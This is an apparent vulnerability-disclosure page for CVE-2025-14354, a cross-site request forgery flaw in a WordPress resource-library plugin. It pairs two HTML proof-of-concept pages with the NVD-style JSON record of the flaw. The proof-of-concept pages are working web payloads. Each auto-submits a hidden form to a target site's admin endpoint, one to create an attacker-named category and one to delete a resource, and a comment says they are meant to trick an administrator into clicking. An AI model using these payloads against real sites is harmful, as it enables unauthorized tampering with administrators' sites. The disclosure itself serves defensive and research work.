CVE-2025-14354

<!-- CSRF PoC for CVE-2025-14354 --> <!-- This PoC demonstrates creating a new resource category --> <html> <body> <h1>CVE-2025-14354 CSRF Attack PoC</h1> <p>诱骗管理员点击此链接将创建一个新的资源分类</p> <form action="http://target-wordpress-site.com/wp-admin/admin-post.php" method="POST" id="csrfForm"> <input type="hidden" name="action" value="add-category"> <input type="hidden" name="category_name" value="Malicious Category"> <input type="hidden" name="category_description" value="Created by attacker via CSRF"> <input type="hidden" name="submit" value="Add Category"> </form> <script> // Auto-submit form when page loads document.getElementById('csrfForm').submit(); </script> </body> </html> <!-- 删除资源的CSRF PoC --> <html> <body> <form action="http://target-wordpress-site.com/wp-admin/admin-post.php" method="POST"> <input type="hidden" name="action" value="delete-resource"> <input type="hidden" name="resource_id" value="1"> <input type="hidden" name="_wpnonce" value=""> </form> <script>document.forms[0].submit();</script> </body> </html>

{"cve": {"id": "CVE-2025-14354", "sourceIdentifier": "[email protected]", "published": "2025-12-12T04:15:49.757", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Resource Library for Logged In Users plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.5. This is due to missing nonce validation on multiple administrative functions. This makes it possible for unauthenticated attackers to perform various unauthorized actions including creating, editing, and deleting resources and categories via a forged request granted they can trick a site administrator into performing an action such as clicking on a link."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/doubledome-resource-link-library/tags/1.4/includes/class-ddrll.php#L168", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/doubledome-resource-link-library/tags/1.4/includes/class-ddrll.php#L406", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/doubledome-resource-link-library/tags/1.4/includes/class-ddrll.php#L530", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/doubledome-resource-link-library/trunk/includes/class-ddrll.php#L168", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/doubledome-resource-link-library/trunk/includes/class-ddrll.php#L406", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/doubledome-resource-link-library/trunk/includes/class-ddrll.php#L530", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset/3421955/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/71b82f1e-14ae-4eb3-9b46-5fcea1cd5a32?source=cve", "source": "[email protected]"}]}}